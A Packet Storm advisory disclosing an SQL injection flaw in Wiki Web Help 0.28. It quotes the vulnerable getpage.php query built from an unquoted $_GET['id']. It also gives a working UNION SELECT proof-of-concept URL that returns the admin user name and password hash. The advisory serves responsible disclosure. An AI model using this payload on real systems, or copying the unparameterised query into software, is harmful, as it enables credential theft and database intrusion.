Wiki Web Help 0.28 SQL Injection

2010-07-06T00:00:00
ID PACKETSTORM:91499
Type packetstorm
Reporter ADEO Security
Modified 2010-07-06T00:00:00

Description

                                        
                                            `# Version: v0.28 (Possible all versions)  
# Vendor: Richard Bondi - http://wikiwebhelp.org  
# Download: http://wikiwebhelp.org/release/wwh-0.2.8.zip  
  
# Description: "The goal of this project is to create a help  
application that is editable by the community. Standard wiki systems  
are great for many applications. The help application and the wiki is  
an ideal marriage. The problem with the standard wiki in a help  
application is that it leaves you jumping around and does not have the  
smooth flow that we have with a desktop chm type viewer. This project  
aims to return that smooth flow to your wiki based help application."  
  
# Credit: Vulnerability founded by Canberk BOLAT at ADEO Security Labs  
- Mail: security[AT]adeo.com.tr  
- Web: http://security.adeo.com.tr  
  
# Vulnerability:  
In the file named as getpage.php user input don't used in single quotes.  
  
handlers/getpage.php  
---[snip]---  
4 if($page==null) $page = $_GET['id'];  
  
5   
  
6 $sql = "SELECT * FROM page INNER JOIN node ON  
node.node_id=page.node_id WHERE node.node_id=$page";  
---[snip]---  
  
Its successfully exploitable. Please see # PoC section.  
  
# PoC:  
Request: http://server/handlers/getpage.php?id=9999999+UNION+SELECT+1,CONCAT_WS(0x3a,user_name,password),3,4,5,6,7+FROM+user+LIMIT+1  
  
Response: admin:21232f297a57a5a743894a0e4a801fc3  
  
`